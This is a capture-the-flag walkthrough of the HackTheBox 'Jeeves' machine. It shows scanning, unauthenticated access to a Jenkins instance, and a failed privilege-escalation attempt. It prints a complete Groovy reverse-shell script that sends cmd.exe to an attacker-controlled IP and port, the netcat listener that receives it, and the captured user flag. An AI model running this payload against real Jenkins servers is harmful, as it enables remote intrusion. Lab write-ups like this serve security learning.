Jeeves – HacktheBox
After getting the email that Jeeves will be retiring soon I thought I’d give it a go. This is the first Windows box that I’ve done in quite a while. Lets get into it
START
A quick nmap scan to see what ports are open. The -F tag is Fast mode – Scan fewer ports than the default scan.
[root:~/Desktop/jeeves]# nmap -F 10.10.10.63 Starting Nmap 7.70SVN ( https://nmap.org ) at 2018-05-17 10:09 BST Nmap scan report for 10.10.10.63 Host is up, received echo-reply ttl 127 (0.029s latency). Not shown: 97 filtered ports Reason: 97 no-responses Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds
Looks like a webserver is available and remote desktop. While i do a full port scan I’ll load up Firefox and take a look at the website.
When I use the search it brings be to a page with an error – it looks like it is displaying a picture rather than html or other code
The full port scan completed
Nmap scan report for 10.10.10.63 Host is up, received echo-reply ttl 127 (0.035s latency). PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2018-05-09 02:02:11 |_ start_date: 2018-05-07 03:07:55
Port 50000 has a Jetty Server running. A quick Google reveals “Eclipse Jetty provides a Web server and javax.servlet container, plus support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. These components are open source and available for commercial use and distribution.” https://www.eclipse.org/jetty/
Checking to see what is on that webserver. Followed by a dirbuster on port 50000.
I browsed to the askjeeves directory and got what looks like a CMS called Jenkins.
A quick Google and it looks like Jenkins is a self-contained Java-based program, ready to run out-of-the-box, with packages for Windows, Mac OS X and other Unix-like operating systems.
I fired up Metasploit to see if it had a Jenkins module and sure enough it did have a few. I tried out one.
msf post(multi/gather/jenkins_gather) > use auxiliary/scanner/http/jenkins_enum msf auxiliary(scanner/http/jenkins_enum) > show options Module options (auxiliary/scanner/http/jenkins_enum): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.63 yes The target address range or CIDR identifier RPORT 50000 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /askjeeves/ yes The path to the Jenkins-CI application THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(scanner/http/jenkins_enum) > run [+] [2018.05.17-11:02:57] 10.10.10.63:50000 - Jenkins Version 2.87 [+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/script does not require authentication (200) [+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/view/All/newJob does not require authentication (200) [+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/asynchPeople/ does not require authentication (200) [+] [2018.05.17-11:02:57] http://10.10.10.63:50000/askjeeves/ - /askjeeves/systemInfo does not require authentication (200) [*] [2018.05.17-11:02:57] Getting useful information from systemInfo OS: Windows 10 OS Version: 10.0 Arch: x86 User: kohsuke Domain: JEEVES Home Directory: C:\Users\kohsuke Language: en Country: US Timezone: America/New_York Computer Name: JEEVES System Drive: C: Temp Directory: C:\Users\kohsuke\AppData\Local\Temp Temp Directory: C:\Users\kohsuke\AppData\Local\Temp [*] [2018.05.17-11:02:58] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(scanner/http/jenkins_enum) >
So it is a Windows 10 box with a user kohsuke and the Jenkins application is v 2.87.
I browsed through the CMS and found a way to execute commands through a jar file I had to download
Looks like it worked [root:~/Desktop/jeeves]# java -jar jenkins-cli.jar -s http://10.10.10.63:50000/askjeeves/ who-am-i (master✱) Authenticated as: anonymous Authorities: [root:~/Desktop/jeeves]#
Now what can I run? Noting useful by the looks of it
Available Commands
add-job-to-view | Adds jobs to view. |
build | Builds a job, and optionally waits until its completion. |
cancel-quiet-down | Cancel the effect of the “quiet-down” command. |
clear-queue | Clears the build queue. |
connect-node | Reconnect to a node(s) |
console | Retrieves console output of a build. |
copy-job | Copies a job. |
create-credentials-by-xml | Create Credential by XML |
create-credentials-domain-by-xml | Create Credentials Domain by XML |
create-job | Creates a new job by reading stdin as a configuration XML file. |
create-node | Creates a new node by reading stdin as a XML configuration. |
create-view | Creates a new view by reading stdin as a XML configuration. |
declarative-linter | Validate a Jenkinsfile containing a Declarative Pipeline |
delete-builds | Deletes build record(s). |
delete-credentials | Delete a Credential |
delete-credentials-domain | Delete a Credentials Domain |
delete-job | Deletes job(s). |
delete-node | Deletes node(s) |
delete-view | Deletes view(s). |
disable-job | Disables a job. |
disconnect-node | Disconnects from a node. |
enable-job | Enables a job. |
get-credentials-as-xml | Get a Credentials as XML (secrets redacted) |
get-credentials-domain-as-xml | Get a Credentials Domain as XML |
get-gradle | List available gradle installations |
get-job | Dumps the job definition XML to stdout. |
get-node | Dumps the node definition XML to stdout. |
get-view | Dumps the view definition XML to stdout. |
groovy | Executes the specified Groovy script. |
groovysh | Runs an interactive groovy shell. |
help | Lists all the available commands or a detailed description of single command. |
install-plugin | Installs a plugin either from a file, an URL, or from update center. |
install-tool | Performs automatic tool installation, and print its location to stdout. Can be only called from inside a build. [deprecated] |
keep-build | Mark the build to keep the build forever. |
list-changes | Dumps the changelog for the specified build(s). |
list-credentials | Lists the Credentials in a specific Store |
list-credentials-context-resolvers | List Credentials Context Resolvers |
list-credentials-providers | List Credentials Providers |
list-jobs | Lists all jobs in a specific view or item group. |
list-plugins | Outputs a list of installed plugins. |
login | Saves the current credentials to allow future commands to run without explicit credential information. [deprecated] |
logout | Deletes the credentials stored with the login command. [deprecated] |
Reads stdin and sends that out as an e-mail. | |
offline-node | Stop using a node for performing builds temporarily, until the next “online-node” command. |
online-node | Resume using a node for performing builds, to cancel out the earlier “offline-node” command. |
quiet-down | Quiet down Jenkins, in preparation for a restart. Don’t start any builds. |
reload-configuration | Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk. |
reload-job | Reload job(s) |
remove-job-from-view | Removes jobs from view. |
replay-pipeline | Replay a Pipeline build with edited script taken from standard input |
restart | Restart Jenkins. |
safe-restart | Safely restart Jenkins. |
safe-shutdown | Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins. |
session-id | Outputs the session ID, which changes every time Jenkins restarts. |
set-build-description | Sets the description of a build. |
set-build-display-name | Sets the displayName of a build. |
set-build-parameter | Update/set the build parameter of the current build in progress. [deprecated] |
set-build-result | Sets the result of the current build. Works only if invoked from within a build. [deprecated] |
shutdown | Immediately shuts down Jenkins server. |
update-credentials-by-xml | Update Credentials by XML |
update-credentials-domain-by-xml | Update Credentials Domain by XML |
update-job | Updates the job definition XML from stdin. The opposite of the get-job command. |
update-node | Updates the node definition XML from stdin. The opposite of the get-node command. |
update-view | Updates the view definition XML from stdin. The opposite of the get-view command. |
version | Outputs the current version. |
wait-node-offline | Wait for a node to become offline. |
wait-node-online | Wait for a node to become online. |
who-am-i | Reports your credential and permissions. |
I need to upload a reverse shell and run it.
I found this page and a Groovy reverse shell script on https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 I modified the ip and port and started a netcat listener.
String host="10.10.14.234"; int port=55555; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Bingo!
[root:~/Desktop/jeeves]# nc -nlvp 55555 (master✱) listening on [any] 55555 ... connect to [10.10.14.234] from (UNKNOWN) [10.10.10.63] 49680 Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Users\Administrator\.jenkins>
Time to capture the user flag
C:\Users\kohsuke\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is BE50-B1C9 Directory of C:\Users\kohsuke\Desktop 11/03/2017 11:19 PM <DIR> . 11/03/2017 11:19 PM <DIR> .. 11/03/2017 11:22 PM 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 7,165,026,304 bytes free C:\Users\kohsuke\Desktop>type user.txt type user.txt e3232272596fb47950d59c4cf1e7066a
Now for priv esc. Lets see what OS version is running and look for exploits.
C:\>systeminfo
systeminfo
Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 5/16/2018, 2:50:22 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
“Researchers Discovered this Exploit in Microsoft Windows 10 Redstone 1 (August 2016) and specifically Target Microsoft Windows 10 x64 Version 1511 and The build number is Microsoft Windows 10.0.10586.” https://gbhackers.com/nsa-malware-eternalblue-successfully-exploit-and-port-into-microsoft-windows-10/
So I’ve learned that Windows 10 is also vulnerable to Eternal Blue. I tried finding the Windows 10 exploit but couldn’t and the Windows 7 one doesn’t work ( i tried it).
After poking about the server i found a keypass file.
C:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,032,320,000 bytes free
I could not get it downloaded to my machine. If it was on a Linux but it would be a lot easier but a netcat connection on a Windows box made it impossible ( for me ).
Summary
I didn’t learn much on this box other than to search for files in DOS.
dir fileyouwant.whatever /s /p
Disappointed that I was unable to figure out how to transfer the file to my box. Please add a comment on how you would have done it.
FIN